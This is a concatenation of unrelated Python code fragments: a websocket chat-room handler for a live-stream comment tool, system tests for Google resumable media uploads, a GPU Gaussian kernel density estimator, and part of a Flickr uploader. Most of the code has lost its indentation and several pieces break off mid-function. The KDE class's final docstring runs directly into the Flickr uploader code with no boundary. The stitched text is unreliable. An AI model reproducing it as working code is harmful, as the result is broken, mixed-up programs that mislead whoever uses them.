if room_id not in self._rooms:
if not await self._add_room(room_id):
return
room = self._rooms.get(room_id, None)
return room
async def add_client(self, room_id, client: 'ChatHandler'):
if room_id not in self._rooms:
if not await self._add_room(room_id):
client.close()
return
room = self._rooms.get(room_id, None)
if room is None:
return
room.clients.append(client)
logger.info('%d clients in room %s', len(room.clients), room_id)
if client.auto_translate:
room.auto_translate_count += 1
await client.on_join_room()
def del_client(self, room_id, client: 'ChatHandler'):
room = self._rooms.get(room_id, None)
if room is None:
return
try:
room.clients.remove(client)
except ValueError:
            # _add_room has not finished yet, so room.clients.append was never reached
pass
else:
logger.info('%d clients in room %s', len(room.clients), room_id)
if client.auto_translate:
room.auto_translate_count = max(0, room.auto_translate_count - 1)
if not room.clients:
self._del_room(room_id)
async def _add_room(self, room_id):
if room_id in self._rooms:
return True
logger.info('Creating room %d', room_id)
self._rooms[room_id] = room = Room(room_id)
if await room.init_room():
# start new log file
room.start()
logger.info('%d rooms', len(self._rooms))
return True
else:
self._del_room(room_id)
return False
def _del_room(self, room_id):
room = self._rooms.get(room_id, None)
if room is None:
return
logger.info('Removing room %d', room_id)
for client in room.clients:
client.close()
room.stop_and_close()
self._rooms.pop(room_id, None)
logger.info('%d rooms', len(self._rooms))
# noinspection PyAbstractClass
class ChatHandler(tornado.websocket.WebSocketHandler):
HEARTBEAT_INTERVAL = 10
RECEIVE_TIMEOUT = HEARTBEAT_INTERVAL + 5
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._heartbeat_timer_handle = None
self._receive_timeout_timer_handle = None
self.room_id = None
self.auto_translate = False
def open(self):
logger.info('Websocket connected %s', self.request.remote_ip)
self._heartbeat_timer_handle = asyncio.get_event_loop().call_later(
self.HEARTBEAT_INTERVAL, self._on_send_heartbeat
)
self._refresh_receive_timeout_timer()
def _on_send_heartbeat(self):
self.send_message(Command.HEARTBEAT, {})
self._heartbeat_timer_handle = asyncio.get_event_loop().call_later(
self.HEARTBEAT_INTERVAL, self._on_send_heartbeat
)
def _refresh_receive_timeout_timer(self):
if self._receive_timeout_timer_handle is not None:
self._receive_timeout_timer_handle.cancel()
self._receive_timeout_timer_handle = asyncio.get_event_loop().call_later(
self.RECEIVE_TIMEOUT, self._on_receive_timeout
)
def _on_receive_timeout(self):
logger.warning('Client %s timed out', self.request.remote_ip)
self._receive_timeout_timer_handle = None
self.close()
def on_close(self):
logger.info('Websocket disconnected %s room: %s', self.request.remote_ip, str(self.room_id))
if self.has_joined_room:
room_manager.del_client(self.room_id, self)
if self._heartbeat_timer_handle is not None:
self._heartbeat_timer_handle.cancel()
self._heartbeat_timer_handle = None
if self._receive_timeout_timer_handle is not None:
self._receive_timeout_timer_handle.cancel()
self._receive_timeout_timer_handle = None
def on_message(self, message):
try:
            # also disconnect clients that never joined a room before the timeout
if self.has_joined_room:
self._refresh_receive_timeout_timer()
body = json.loads(message)
cmd = body['cmd']
if cmd == Command.HEARTBEAT:
pass
elif cmd == Command.JOIN_ROOM:
if self.has_joined_room:
return
self._refresh_receive_timeout_timer()
self.room_id = int(body['data']['roomId'])
logger.info('Client %s is joining room %d', self.request.remote_ip, self.room_id)
try:
cfg = body['data']['config']
self.auto_translate = cfg['autoTranslate']
except KeyError:
pass
asyncio.ensure_future(room_manager.add_client(self.room_id, self))
else:
logger.warning('Unknown cmd, client: %s, cmd: %d, body: %s', self.request.remote_ip, cmd, body)
except Exception:
logger.exception('on_message error, client: %s, message: %s', self.request.remote_ip, message)
    # for cross-origin testing
def check_origin(self, origin):
if self.application.settings['debug']:
return True
return super().check_origin(origin)
@property
def has_joined_room(self):
return self.room_id is not None
def send_message(self, cmd, data):
body = json.dumps({'cmd': cmd, 'data': data})
try:
self.write_message(body)
except tornado.websocket.WebSocketClosedError:
self.close()
async def on_join_room(self):
if self.application.settings['debug']:
await self.send_test_message()
        # notify the client that auto translation is not allowed in this room
if self.auto_translate:
cfg = config.get_config()
if cfg.allow_translate_rooms and self.room_id not in cfg.allow_translate_rooms:
self.send_message(Command.ADD_TEXT, make_text_message(
models.avatar.DEFAULT_AVATAR_URL,
int(time.time()),
'blivechat',
2,
'Translation is not allowed in this room. Please download to use translation',
0,
False,
60,
False,
True,
0,
uuid.uuid4().hex,
''
))
    # for testing
async def send_test_message(self):
base_data = {
'avatarUrl': await models.avatar.get_avatar_url(300474),
'timestamp': int(time.time()),
'authorName': 'xfgryujk',
}
text_data = make_text_message(
base_data['avatarUrl'],
base_data['timestamp'],
base_data['authorName'],
0,
'我能吞下玻璃而不伤身体',
0,
False,
20,
False,
True,
0,
uuid.uuid4().hex,
''
)
member_data = {
**base_data,
'id': uuid.uuid4().hex,
'privilegeType': 3
}
gift_data = {
**base_data,
'id': uuid.uuid4().hex,
'totalCoin': 450000,
'giftName': '摩天大楼',
'num': 1
}
sc_data = {
**base_data,
'id': str(random.randint(1, 65535)),
'price': 30,
'content': 'The quick brown fox jumps over the lazy dog',
'translation': ''
}
self.send_message(Command.ADD_TEXT, text_data)
text_data[2] = '主播'
text_data[3] = 3
text_data[4] = "I can eat glass, it doesn't hurt me."
text_data[11] = uuid.uuid4().hex
self.send_message(Command.ADD_TEXT, text_data)
self.send_message(Command.ADD_MEMBER, member_data)
self.send_message(Command.ADD_SUPER_CHAT, sc_data)
sc_data['id'] = str(random.randint(1, 65535))
sc_data['price'] = 100
sc_data['content'] = '敏捷的棕色狐狸跳过了懒狗'
self.send_message(Command.ADD_SUPER_CHAT, sc_data)
# self.send_message(Command.DEL_SUPER_CHAT, {'ids': [sc_data['id']]})
self.send_message(Command.ADD_GIFT, gift_data)
gift_data['id'] = uuid.uuid4().hex
gift_data['totalCoin'] = 1245000
gift_data['giftName'] = '小电视飞船'
self.send_message(Command.ADD_GIFT, gift_data)
# noinspection PyAbstractClass
class RoomInfoHandler(api.base.ApiHandler):
_host_server_list_cache = blivedm.DEFAULT_DANMAKU_SERVER_LIST
async def get(self):
room_id = int(self.get_query_argument('roomId'))
logger.info('Client %s is getting room info %d', self.request.remote_ip, room_id)
room_id, owner_uid = await self._get_room_info(room_id)
host_server_list = await self._get_server_host_list(room_id)
if owner_uid == 0:
            # cache for 3 minutes
self.set_header('Cache-Control', 'private, max-age=180')
else:
            # cache for 1 day
self.set_header('Cache-Control', 'private, max-age=86400')
self.write({
'roomId': room_id,
'ownerUid': owner_uid,
            'hostServerList': host_server_list
        })
| |
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import hashlib
import io
import os
import pytest
import mock
from six.moves import http_client
from six.moves import urllib_parse
from google.resumable_media import common
from google import resumable_media
import google.resumable_media.requests as resumable_requests
from google.resumable_media import _helpers
from tests.system import utils
from google.resumable_media import _upload
CURR_DIR = os.path.dirname(os.path.realpath(__file__))
DATA_DIR = os.path.join(CURR_DIR, u"..", u"..", u"data")
ICO_FILE = os.path.realpath(os.path.join(DATA_DIR, u"favicon.ico"))
IMAGE_FILE = os.path.realpath(os.path.join(DATA_DIR, u"image1.jpg"))
ICO_CONTENT_TYPE = u"image/x-icon"
JPEG_CONTENT_TYPE = u"image/jpeg"
BYTES_CONTENT_TYPE = u"application/octet-stream"
BAD_CHUNK_SIZE_MSG = (
b"Invalid request. The number of bytes uploaded is required to be equal "
b"or greater than 262144, except for the final request (it's recommended "
b"to be the exact multiple of 262144). The received request contained "
b"1024 bytes, which does not meet this requirement."
)
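# 262144 bytes = 256 KiB, the granularity GCS requires for resumable upload chunks.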
@pytest.fixture
def cleanup():
to_delete = []
def add_cleanup(blob_name, transport):
to_delete.append((blob_name, transport))
yield add_cleanup
for blob_name, transport in to_delete:
metadata_url = utils.METADATA_URL_TEMPLATE.format(blob_name=blob_name)
response = utils.retry_transient_errors(transport.delete)(metadata_url)
assert response.status_code == http_client.NO_CONTENT
@pytest.fixture
def img_stream():
"""Open-file as a fixture.
This is so that an entire test can execute in the context of
the context manager without worrying about closing the file.
"""
with open(IMAGE_FILE, u"rb") as file_obj:
yield file_obj
def get_md5(data):
hash_obj = hashlib.md5(data)
return base64.b64encode(hash_obj.digest())
def get_upload_id(upload_url):
parse_result = urllib_parse.urlparse(upload_url)
parsed_query = urllib_parse.parse_qs(parse_result.query)
# NOTE: We are unpacking here, so asserting exactly one match.
(upload_id,) = parsed_query[u"upload_id"]
return upload_id
def get_num_chunks(total_bytes, chunk_size):
expected_chunks, remainder = divmod(total_bytes, chunk_size)
if remainder > 0:
expected_chunks += 1
return expected_chunks
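# Example: get_num_chunks(1000, 300) -> divmod gives (3, 100), so 4 chunks.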
def check_response(
response,
blob_name,
actual_contents=None,
total_bytes=None,
metadata=None,
content_type=ICO_CONTENT_TYPE,
):
assert response.status_code == http_client.OK
json_response = response.json()
assert json_response[u"bucket"] == utils.BUCKET_NAME
assert json_response[u"contentType"] == content_type
if actual_contents is not None:
md5_hash = json_response[u"md5Hash"].encode(u"ascii")
assert md5_hash == get_md5(actual_contents)
total_bytes = len(actual_contents)
assert json_response[u"metageneration"] == u"1"
assert json_response[u"name"] == blob_name
assert json_response[u"size"] == u"{:d}".format(total_bytes)
assert json_response[u"storageClass"] == u"STANDARD"
if metadata is None:
assert u"metadata" not in json_response
else:
assert json_response[u"metadata"] == metadata
def check_content(blob_name, expected_content, transport, headers=None):
media_url = utils.DOWNLOAD_URL_TEMPLATE.format(blob_name=blob_name)
download = resumable_requests.Download(media_url, headers=headers)
response = download.consume(transport)
assert response.status_code == http_client.OK
assert response.content == expected_content
def check_tombstoned(upload, transport, *args):
assert upload.finished
basic_types = (resumable_requests.SimpleUpload, resumable_requests.MultipartUpload)
if isinstance(upload, basic_types):
with pytest.raises(ValueError):
upload.transmit(transport, *args)
else:
with pytest.raises(ValueError):
upload.transmit_next_chunk(transport, *args)
def check_does_not_exist(transport, blob_name):
metadata_url = utils.METADATA_URL_TEMPLATE.format(blob_name=blob_name)
# Make sure we are creating a **new** object.
response = transport.get(metadata_url)
assert response.status_code == http_client.NOT_FOUND
def check_initiate(response, upload, stream, transport, metadata):
assert response.status_code == http_client.OK
assert response.content == b""
upload_id = get_upload_id(upload.resumable_url)
assert response.headers[u"x-guploader-uploadid"] == upload_id
assert stream.tell() == 0
# Make sure the upload cannot be re-initiated.
with pytest.raises(ValueError) as exc_info:
upload.initiate(transport, stream, metadata, JPEG_CONTENT_TYPE)
exc_info.match(u"This upload has already been initiated.")
def check_bad_chunk(upload, transport):
with pytest.raises(resumable_media.InvalidResponse) as exc_info:
upload.transmit_next_chunk(transport)
error = exc_info.value
response = error.response
assert response.status_code == http_client.BAD_REQUEST
assert response.content == BAD_CHUNK_SIZE_MSG
def transmit_chunks(
upload, transport, blob_name, metadata, num_chunks=0, content_type=JPEG_CONTENT_TYPE
):
while not upload.finished:
num_chunks += 1
response = upload.transmit_next_chunk(transport)
if upload.finished:
assert upload.bytes_uploaded == upload.total_bytes
check_response(
response,
blob_name,
total_bytes=upload.total_bytes,
metadata=metadata,
content_type=content_type,
)
else:
assert upload.bytes_uploaded == num_chunks * upload.chunk_size
assert response.status_code == resumable_media.PERMANENT_REDIRECT
return num_chunks
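# Note: 308 (PERMANENT_REDIRECT) is how the GCS resumable upload protocol
# acknowledges a successfully stored intermediate chunk; only the final chunk
# returns 200 OK with the object metadata.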
def test_simple_upload(authorized_transport, bucket, cleanup):
with open(ICO_FILE, u"rb") as file_obj:
actual_contents = file_obj.read()
blob_name = os.path.basename(ICO_FILE)
# Make sure to clean up the uploaded blob when we are done.
cleanup(blob_name, authorized_transport)
check_does_not_exist(authorized_transport, blob_name)
# Create the actual upload object.
upload_url = utils.SIMPLE_UPLOAD_TEMPLATE.format(blob_name=blob_name)
upload = resumable_requests.SimpleUpload(upload_url)
# Transmit the resource.
response = upload.transmit(authorized_transport, actual_contents, ICO_CONTENT_TYPE)
check_response(response, blob_name, actual_contents=actual_contents)
# Download the content to make sure it's "working as expected".
check_content(blob_name, actual_contents, authorized_transport)
# Make sure the upload is tombstoned.
check_tombstoned(upload, authorized_transport, actual_contents, ICO_CONTENT_TYPE)
def test_simple_upload_with_headers(authorized_transport, bucket, cleanup):
blob_name = u"some-stuff.bin"
# Make sure to clean up the uploaded blob when we are done.
cleanup(blob_name, authorized_transport)
check_does_not_exist(authorized_transport, blob_name)
# Create the actual upload object.
upload_url = utils.SIMPLE_UPLOAD_TEMPLATE.format(blob_name=blob_name)
headers = utils.get_encryption_headers()
upload = resumable_requests.SimpleUpload(upload_url, headers=headers)
# Transmit the resource.
data = b"Binary contents\x00\x01\x02."
response = upload.transmit(authorized_transport, data, BYTES_CONTENT_TYPE)
check_response(
response, blob_name, actual_contents=data, content_type=BYTES_CONTENT_TYPE
)
# Download the content to make sure it's "working as expected".
check_content(blob_name, data, authorized_transport, headers=headers)
# Make sure the upload is tombstoned.
check_tombstoned(upload, authorized_transport, data, BYTES_CONTENT_TYPE)
@pytest.mark.parametrize("checksum", ["md5", "crc32c", None])
def test_multipart_upload(authorized_transport, bucket, cleanup, checksum):
with open(ICO_FILE, u"rb") as file_obj:
actual_contents = file_obj.read()
blob_name = os.path.basename(ICO_FILE)
# Make sure to clean up the uploaded blob when we are done.
cleanup(blob_name, authorized_transport)
check_does_not_exist(authorized_transport, blob_name)
# Create the actual upload object.
upload_url = utils.MULTIPART_UPLOAD
upload = resumable_requests.MultipartUpload(upload_url, checksum=checksum)
# Transmit the resource.
metadata = {u"name": blob_name, u"metadata": {u"color": u"yellow"}}
response = upload.transmit(
authorized_transport, actual_contents, metadata, ICO_CONTENT_TYPE
)
check_response(
response,
blob_name,
actual_contents=actual_contents,
metadata=metadata[u"metadata"],
)
# Download the content to make sure it's "working as expected".
check_content(blob_name, actual_contents, authorized_transport)
# Make sure the upload is tombstoned.
check_tombstoned(
upload, authorized_transport, actual_contents, metadata, ICO_CONTENT_TYPE
)
@pytest.mark.parametrize("checksum", [u"md5", u"crc32c"])
def test_multipart_upload_with_bad_checksum(authorized_transport, checksum, bucket):
with open(ICO_FILE, u"rb") as file_obj:
actual_contents = file_obj.read()
blob_name = os.path.basename(ICO_FILE)
check_does_not_exist(authorized_transport, blob_name)
# Create the actual upload object.
upload_url = utils.MULTIPART_UPLOAD
upload = resumable_requests.MultipartUpload(upload_url, checksum=checksum)
# Transmit the resource.
metadata = {u"name": blob_name, u"metadata": {u"color": u"yellow"}}
fake_checksum_object = _helpers._get_checksum_object(checksum)
fake_checksum_object.update(b"bad data")
fake_prepared_checksum_digest = _helpers.prepare_checksum_digest(
fake_checksum_object.digest()
)
with mock.patch.object(
_helpers, "prepare_checksum_digest", return_value=fake_prepared_checksum_digest
):
with pytest.raises(common.InvalidResponse) as exc_info:
response = upload.transmit(
authorized_transport, actual_contents, metadata, ICO_CONTENT_TYPE
)
response = exc_info.value.response
message = response.json()["error"]["message"]
# Attempt to verify that this is a checksum mismatch error.
assert checksum.upper() in message
assert fake_prepared_checksum_digest in message
# Make sure the upload is tombstoned.
check_tombstoned(
upload, authorized_transport, actual_contents, metadata, ICO_CONTENT_TYPE
)
def test_multipart_upload_with_headers(authorized_transport, bucket, cleanup):
blob_name = u"some-multipart-stuff.bin"
# Make sure to clean up the uploaded blob when we are done.
cleanup(blob_name, authorized_transport)
check_does_not_exist(authorized_transport, blob_name)
# Create the actual upload object.
upload_url = utils.MULTIPART_UPLOAD
headers = utils.get_encryption_headers()
upload = resumable_requests.MultipartUpload(upload_url, headers=headers)
# Transmit the resource.
metadata = {u"name": blob_name}
data = b"Other binary contents\x03\x04\x05."
response = upload.transmit(authorized_transport, data, metadata, BYTES_CONTENT_TYPE)
check_response(
response, blob_name, actual_contents=data, content_type=BYTES_CONTENT_TYPE
)
# Download the content to make sure it's "working as expected".
check_content(blob_name, data, authorized_transport, headers=headers)
# Make sure the upload is tombstoned.
check_tombstoned(upload, authorized_transport, data, metadata, BYTES_CONTENT_TYPE)
def _resumable_upload_helper(
authorized_transport, stream, cleanup, headers=None, checksum=None
):
blob_name = os.path.basename(stream.name)
# Make sure to clean up the uploaded blob when we are done.
cleanup(blob_name, authorized_transport)
check_does_not_exist(authorized_transport, blob_name)
# Create the actual upload object.
chunk_size = resumable_media.UPLOAD_CHUNK_SIZE
upload = resumable_requests.ResumableUpload(
utils.RESUMABLE_UPLOAD, chunk_size, headers=headers, checksum=checksum
)
# Initiate the upload.
metadata = {u"name": blob_name, u"metadata": {u"direction": u"north"}}
response = upload.initiate(
authorized_transport, stream, metadata, JPEG_CONTENT_TYPE
)
# Make sure ``initiate`` succeeded and did not mangle the stream.
check_initiate(response, upload, stream, authorized_transport, metadata)
# Actually upload the file in chunks.
num_chunks = transmit_chunks(
upload, authorized_transport, blob_name, metadata[u"metadata"]
)
assert num_chunks == get_num_chunks(upload.total_bytes, chunk_size)
# Download the content to make sure it's "working as expected".
stream.seek(0)
actual_contents = stream.read()
check_content(blob_name, actual_contents, authorized_transport, headers=headers)
# Make sure the upload is tombstoned.
check_tombstoned(upload, authorized_transport)
@pytest.mark.parametrize("checksum", [u"md5", u"crc32c", None])
def test_resumable_upload(authorized_transport, img_stream, bucket, cleanup, checksum):
_resumable_upload_helper(
authorized_transport, img_stream, cleanup, checksum=checksum
)
def test_resumable_upload_with_headers(
authorized_transport, img_stream, bucket, cleanup
):
headers = utils.get_encryption_headers()
_resumable_upload_helper(authorized_transport, img_stream, cleanup, headers=headers)
@pytest.mark.parametrize("checksum", [u"md5", u"crc32c"])
def test_resumable_upload_with_bad_checksum(
authorized_transport, img_stream, bucket, cleanup, checksum
):
fake_checksum_object = _helpers._get_checksum_object(checksum)
fake_checksum_object.update(b"bad data")
fake_prepared_checksum_digest = _helpers.prepare_checksum_digest(
fake_checksum_object.digest()
)
with mock.patch.object(
_helpers, "prepare_checksum_digest", return_value=fake_prepared_checksum_digest
):
with pytest.raises(common.DataCorruption) as exc_info:
_resumable_upload_helper(
authorized_transport, img_stream, cleanup, checksum=checksum
)
expected_checksums = {"md5": "1bsd83IYNug8hd+V1ING3Q==", "crc32c": "YQGPxA=="}
expected_message = _upload._UPLOAD_CHECKSUM_MISMATCH_MESSAGE.format(
checksum.upper(), fake_prepared_checksum_digest, expected_checksums[checksum]
)
assert exc_info.value.args[0] == expected_message
def test_resumable_upload_bad_chunk_size(authorized_transport, img_stream):
blob_name = os.path.basename(img_stream.name)
# Create the actual upload object.
upload = resumable_requests.ResumableUpload(
utils.RESUMABLE_UPLOAD, resumable_media.UPLOAD_CHUNK_SIZE
)
# Modify the ``upload`` **after** construction so we can
# use a bad chunk size.
upload._chunk_size = 1024
assert upload._chunk_size < resumable_media.UPLOAD_CHUNK_SIZE
# Initiate the upload.
metadata = {u"name": blob_name}
response = upload.initiate(
authorized_transport, img_stream, metadata, JPEG_CONTENT_TYPE
)
# Make sure ``initiate`` succeeded and did not mangle the stream.
check_initiate(response, upload, img_stream, authorized_transport, metadata)
# Make the first request and verify that it fails.
check_bad_chunk(upload, authorized_transport)
    # Reset the chunk
| |
    # evaluate the weighted sum
estimate = np.zeros((m, p), dtype)
for i in range(n):
for j in range(m):
arg = 0
for k in range(d):
residual = (points_[i, k] - xi_[j, k])
arg += residual * residual
arg = np.exp(-arg / 2) * norm
for k in range(p):
estimate[j, k] += values_[i, k] * arg
return np.asarray(estimate)
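# In whitened coordinates the loop above computes, for each evaluation point x_j,
#   estimate[j, k] = sum_i values[i, k] * norm * exp(-||points_i - x_j||^2 / 2),
# i.e. a standard-normal kernel applied after both point sets have been whitened.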
@dataclass(frozen=True)
class GaussianKDEInformation:
points: np.ndarray # (d, n) shaped array of datapoints
weights: np.ndarray # (d, n) shaped array of weights, optional
dimension: int # data dimension
n: int # number of data points
neff: float # effective sample size
CovarianceFactorFunctionType = tp.Callable[[GaussianKDEInformation], float]
SCOTTS_FACTOR_STRING = 'scotts'
SILVERMAN_FACTOR_STRING = 'silverman'
def compute_scotts_factor(kde_info: GaussianKDEInformation) -> float:
return power(kde_info.neff, -1.0 / (kde_info.dimension + 4))
def compute_silverman_factor(kde_info: GaussianKDEInformation) -> float:
d = kde_info.dimension
neff = kde_info.neff
return power(neff * (d + 2.0) / 4.0, -1.0 / (d + 4))
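# Worked example: for neff = 1000 and d = 2, Scott's factor is
# 1000 ** (-1 / 6) ≈ 0.316, so the bandwidth shrinks as the sample size grows.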
# class CovarianceFactor(ABC):
# @abstractmethod
# def compute_covariance_factor(self, kde_info: GaussianKDEInformation) -> float:
# pass
#
#
# class ScottsFactor(CovarianceFactor):
# def compute_covariance_factor(self, kde_info: GaussianKDEInformation) -> float:
# return power(kde_info.neff, -1.0 / (kde_info.dimension + 4))
#
#
# class SilvermanFactor(CovarianceFactor):
# def compute_covariance_factor(self, kde_info: GaussianKDEInformation) -> float:
# d = kde_info.dimension
# neff = kde_info.neff
# return power(neff * (d + 2.0) / 4.0, -1.0 / (d + 4))
#
#
# class LambdaCovarianceFactor(CovarianceFactor):
# def __init__(self, covariance_factor_fun: tp.Callable[[GaussianKDEInformation], float]):
# self._covariance_factor_fun = covariance_factor_fun
#
# def compute_covariance_factor(self, kde_info: GaussianKDEInformation) -> float:
# return self._covariance_factor_fun(kde_info)
class gaussian_kde:
"""Representation of a kernel-density estimate using Gaussian kernels.
Kernel density estimation is a way to estimate the probability density
function (PDF) of a random variable in a non-parametric way.
`gaussian_kde` works for both uni-variate and multi-variate data. It
includes automatic bandwidth determination. The estimation works best for
a unimodal distribution; bimodal or multi-modal distributions tend to be
oversmoothed.
Parameters
----------
dataset : array_like
Datapoints to estimate from. In case of univariate data this is a 1-D
array, otherwise a 2-D array with shape (# of dims, # of data).
bw_method : str, scalar or callable, optional
The method used to calculate the estimator bandwidth. This can be
'scott', 'silverman', a scalar constant or a callable. If a scalar,
this will be used directly as `kde.factor`. If a callable, it should
take a `gaussian_kde` instance as only parameter and return a scalar.
If None (default), 'scott' is used. See Notes for more details.
weights : array_like, optional
weights of datapoints. This must be the same shape as dataset.
If None (default), the samples are assumed to be equally weighted
gpu: whether to evaluate the kernel density estimate on the gpu
Attributes
----------
dataset : ndarray
The dataset with which `gaussian_kde` was initialized.
d : int
Number of dimensions.
n : int
Number of datapoints.
neff : int
Effective number of datapoints.
.. versionadded:: 1.2.0
factor : float
The bandwidth factor, obtained from `kde.covariance_factor`, with which
the covariance matrix is multiplied.
covariance : ndarray
The covariance matrix of `dataset`, scaled by the calculated bandwidth
(`kde.factor`).
inv_cov : ndarray
The inverse of `covariance`.
Methods
-------
evaluate
__call__
integrate_gaussian
integrate_box_1d
integrate_box
integrate_kde
pdf
logpdf
resample
Notes
-----
Bandwidth selection strongly influences the estimate obtained from the KDE
(much more so than the actual shape of the kernel). Bandwidth selection
can be done by a "rule of thumb", by cross-validation, by "plug-in
methods" or by other means; see [3]_, [4]_ for reviews. `gaussian_kde`
uses a rule of thumb, the default is Scott's Rule.
Scott's Rule [1]_, implemented as `scotts_factor`, is::
n**(-1./(d+4)),
with ``n`` the number of data points and ``d`` the number of dimensions.
In the case of unequally weighted points, `scotts_factor` becomes::
neff**(-1./(d+4)),
with ``neff`` the effective number of datapoints.
Silverman's Rule [2]_, implemented as `silverman_factor`, is::
(n * (d + 2) / 4.)**(-1. / (d + 4)).
or in the case of unequally weighted points::
(neff * (d + 2) / 4.)**(-1. / (d + 4)).
Good general descriptions of kernel density estimation can be found in [1]_
and [2]_, the mathematics for this multi-dimensional implementation can be
found in [1]_.
With a set of weighted samples, the effective number of datapoints ``neff``
is defined by::
neff = sum(weights)^2 / sum(weights^2)
as detailed in [5]_.
References
----------
.. [1] <NAME>, "Multivariate Density Estimation: Theory, Practice, and
Visualization", John Wiley & Sons, New York, Chicester, 1992.
.. [2] <NAME>, "Density Estimation for Statistics and Data
Analysis", Vol. 26, Monographs on Statistics and Applied Probability,
Chapman and Hall, London, 1986.
.. [3] <NAME>, "Bandwidth Selection in Kernel Density Estimation: A
Review", CORE and Institut de Statistique, Vol. 19, pp. 1-33, 1993.
.. [4] <NAME> and <NAME>, "Bandwidth selection for kernel
conditional density estimation", Computational Statistics & Data
Analysis, Vol. 36, pp. 279-298, 2001.
.. [5] <NAME>., 1969, Journal of the Royal Statistical Society.
Series A (General), 132, 272
Examples
--------
Generate some random two-dimensional data:
>>> from scipy import stats
>>> def measure(n):
... "Measurement model, return two coupled measurements."
... m1 = np.random.normal(size=n)
... m2 = np.random.normal(scale=0.5, size=n)
... return m1+m2, m1-m2
>>> m1, m2 = measure(2000)
>>> xmin = m1.min()
>>> xmax = m1.max()
>>> ymin = m2.min()
>>> ymax = m2.max()
Perform a kernel density estimate on the data:
>>> X, Y = np.mgrid[xmin:xmax:100j, ymin:ymax:100j]
>>> positions = np.vstack([X.ravel(), Y.ravel()])
>>> values = np.vstack([m1, m2])
>>> kernel = stats.gaussian_kde(values)
>>> Z = np.reshape(kernel(positions).T, X.shape)
Plot the results:
>>> import matplotlib.pyplot as plt
>>> fig, ax = plt.subplots()
>>> ax.imshow(np.rot90(Z), cmap=plt.cm.gist_earth_r,
... extent=[xmin, xmax, ymin, ymax])
>>> ax.plot(m1, m2, 'k.', markersize=2)
>>> ax.set_xlim([xmin, xmax])
>>> ax.set_ylim([ymin, ymax])
>>> plt.show()
"""
def __init__(self,
dataset: NumericArray,
bw_method: tp.Optional[tp.Union[CovarianceFactorFunctionType,
str,
tp.Callable,
numbers.Number]] = None,
weights: tp.Optional[NumericArray] = None,
gpu: bool = False):
self._num_pack = select_num_pack(gpu)
self._gpu = gpu
self.dataset = atleast_2d(asarray(dataset))
        if self.dataset.size <= 1:
            raise ValueError("`dataset` input should have multiple elements.")
        self.d, self.n = self.dataset.shape
        if weights is not None:
            weights = atleast_1d(weights).astype(float)
            if weights.ndim != 1:
                raise ValueError("`weights` input should be one-dimensional.")
            if len(weights) != self.n:
                raise ValueError("`weights` input should be of length n")
            # Validate before normalizing so errors refer to the raw input.
            weights /= np.sum(weights)
            self._neff = 1.0/np.sum(weights**2)
else:
weights = ones(self.n) / self.n
if gpu:
dtype = np.float32
weights = weights.astype(dtype)
self.dataset = self.dataset.astype(dtype)
self._weights = weights
self._covariance_factor = \
self._get_covariance_factor_function_from_bandwidth_type(bw_method)
self._compute_covariance()
def _check_and_adjust_dimensions_of_points(self, points: np.ndarray) \
-> np.ndarray:
points = atleast_2d(asarray(points))
d, m = points.shape
if d != self.d:
if d == 1 and m == self.d:
# points was passed in as a row vector
points = reshape(points, (self.d, 1))
m = 1
else:
raise ValueError(f"points have dimension {d}, "
f"dataset has dimension {self.d}")
return points
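        # Illustration: for a 3-dimensional KDE (self.d == 3), an input of
        # shape (1, 3) is treated as a single 3-d point and reshaped to
        # (3, 1); any other mismatch of the first dimension raises ValueError.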
def evaluate(self, points):
"""
Evaluate the estimated pdf on a set of points.
Parameters
----------
points : (# of dimensions, # of points)-array
Alternatively, a (# of dimensions,) vector can be passed in and
treated as a single point.
Returns
-------
values : (# of points,)-array
The values at each point.
Raises
------
        ValueError : if the dimensionality of the input points is different
                     from the dimensionality of the KDE.
"""
points = self._check_and_adjust_dimensions_of_points(points)
output_dtype = np.common_type(self.covariance, points)
        # Evaluate against the pre-whitened dataset; this avoids re-deriving
        # the whitening transform from the precision matrix on every call.
        # (A slower, non-whitened path via gaussian_kernel_estimate exists
        # but is intentionally not used here.)
        result = gaussian_kernel_estimate_vectorized_whitened(
            whitening=self.whitening,
            whitened_points=self.whitened_points,
            values=self.weights[:, None],
            xi=points.T,
            norm=self.normalization_constant,
            dtype=output_dtype,
            gpu=self._gpu)
        return result
__call__ = evaluate
def evaluate_in_batches(self,
points: NumericArray,
maximum_number_of_elements_per_batch: int) \
-> np.ndarray:
"""
Evaluates a Gaussian KDE in batches and stores the results in main memory.
Args:
points:
numeric array with shape (d, m) containing the points at which to evaluate the kernel
density estimate
maximum_number_of_elements_per_batch:
maximum number of data points times evaluation points to process in a single batch
Returns:
a m-dimensional NumPy array of kernel density estimates
"""
points_per_batch = math.floor(maximum_number_of_elements_per_batch / (self.n * self.d))
args_list = _split_points_into_batches(points, points_per_batch)
result = \
map_combine_single_device(f=self.evaluate,
combination=lambda x: np.hstack(x),
args_list=args_list)
return result
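    # Usage sketch (hypothetical shapes and budget): with a 2-d KDE over
    # 10_000 samples and 1_000_000 evaluation points, capping each batch at
    # ~1e8 elements bounds the intermediate (n x batch) kernel matrix:
    #
    #     density = kde.evaluate_in_batches(
    #         points=grid,  # shape (2, 1_000_000)
    #         maximum_number_of_elements_per_batch=10**8)
    #     assert density.shape == (1_000_000,)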
def evaluate_in_batches_on_multiple_devices(self,
points: NumericArray,
maximum_number_of_elements_per_batch: int,
compute_device_pool: ComputeDevicePool) \
-> np.ndarray:
"""
        Evaluates a Gaussian KDE in batches on multiple GPUs and stores the
        results in main memory.
            # ... calling replace_photo
if file_checksum is None:
file_checksum = faw.md5checksum(file)
if file_checksum != str(row[4]):
self.replace_photo(lock, file, row[1], row[4],
file_checksum, last_modified,
cur, con)
# Closing DB connection
litedb.close(con)
return success
# -------------------------------------------------------------------------
# replace_photo
# Should be only called from upload_file
#
# lock = parameter for multiprocessing control of access to DB
# (if self.args.processes = 0 then lock can be None
# as it is not used)
# file = file to be uploaded to replace existing file
# file_id = ID of the photo being replaced
# oldfile_md5 = Old file MD5 (required to update checksum tag
    #                 on Flickr)
# file_md5 = New file MD5
# last_modified = date/time last modification of the file to update
# database
# cur = current cursor for updating Database
# con = current DB connection
#
def replace_photo(self, lock, file, file_id,
oldfile_md5, file_md5, last_modified, cur, con):
""" replace_photo
